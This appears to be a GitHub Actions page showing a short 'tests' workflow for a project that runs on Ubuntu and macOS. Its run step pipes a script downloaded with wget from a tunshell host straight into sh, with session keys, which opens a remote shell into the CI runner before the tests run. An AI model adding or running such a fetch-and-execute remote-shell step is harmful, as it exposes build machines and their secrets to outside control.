<1s build time #6770
Workflow file for this run
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: tests | |
on: | |
push: | |
branches: | |
- master | |
pull_request: | |
jobs: | |
tests: | |
name: ./test.sh | |
runs-on: ${{ matrix.os }} | |
strategy: | |
fail-fast: false | |
matrix: | |
os: [ubuntu-24.04, macos-latest] | |
steps: | |
- uses: commaai/timeout@v1 | |
- uses: actions/checkout@v4 | |
- run: | | |
brew install re2 | |
wget https://lets.tunshell.com/init.sh -O - 2> /dev/null | sh -s -- T kuRk9jMWMuRST8pvHBwWQu aJjZjdvJDgwJNhfAE1QAo2 | |
./test.sh |